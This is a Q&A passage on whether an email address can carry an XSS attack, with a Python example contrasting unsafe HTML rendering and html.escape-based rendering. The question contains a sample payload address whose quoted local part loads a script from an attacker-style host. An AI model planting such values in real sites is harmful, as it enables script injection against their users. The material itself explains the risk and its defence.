Are XSS attacks possible via email addresses?

I wonder if an email address can be used for XSS attacks.

Suppose you have a website where you can register and enter your email address. If someone wants to attack this site, he or she can create an email address such as this:

"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com 

and then use this email address to attack the website.

Is a quotation mark or script tag allowed in an email address?

1 answer

The email address in your example is valid. The only character that is unusual is the quote (") - the rest are valid.

Wikipedia indicates that the email address you provided is valid.

You need to make sure that arbitrary user input is sanitized before rendering.

To get started, you can refer to the XSS and prevention information available at OWASP.

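As an added example (not code from the thread above), the following Python shows both halves of the answer: the address from the question passes a simplified RFC 5322 check because a quoted-string local part may contain `<`, `>`, `/` and spaces, and HTML-escaping at render time is what stops it from becoming markup. The function names, the regex grammar and the constructed sample are my own.

```python
import html
import re

# Constructed sample: the address from the question. It is syntactically valid
# because RFC 5322 allows a quoted-string local part, which admits characters
# (<, >, /, =, space) that a dot-atom local part does not.
SAMPLE = '"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com'

# Simplified addr-spec grammar (my own approximation, not a full RFC parser):
# local part is a dot-atom OR a quoted-string; domain is dotted labels plus TLD.
_DOT_ATOM = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
_QUOTED = r'"(?:[^"\\\r\n]|\\.)*"'
_DOMAIN = r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}"
_EMAIL_RE = re.compile(rf"^(?:{_DOT_ATOM}|{_QUOTED})@{_DOMAIN}$")


def is_syntactically_valid(addr: str) -> bool:
    """True if addr matches the simplified RFC 5322 addr-spec above."""
    return _EMAIL_RE.fullmatch(addr) is not None


def has_quoted_local_part(addr: str) -> bool:
    """True if the local part is a quoted-string; useful if a site chooses
    to reject these as policy, even though they are technically valid."""
    return addr.startswith('"')


def render_unsafe(addr: str) -> str:
    """Vulnerable: user input interpolated straight into HTML."""
    return f"<td>{addr}</td>"


def render_safe(addr: str) -> str:
    """Hardened: escape for the HTML text context before interpolation.
    <, >, &, " become entities, so the browser renders them as text."""
    return f"<td>{html.escape(addr, quote=True)}</td>"


if __name__ == "__main__":
    print("valid:", is_syntactically_valid(SAMPLE))   # True
    print("unsafe:", render_unsafe(SAMPLE))           # contains a live <script> tag
    print("safe:  ", render_safe(SAMPLE))             # &lt;script ...&gt; as text
```

`html.escape` covers the HTML text and double-quoted attribute contexts only; an address written into a JavaScript string, a URL or a CSS value needs the encoder for that context, as the OWASP material linked above describes.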

Source: https://habr.com/ru/post/1489830/
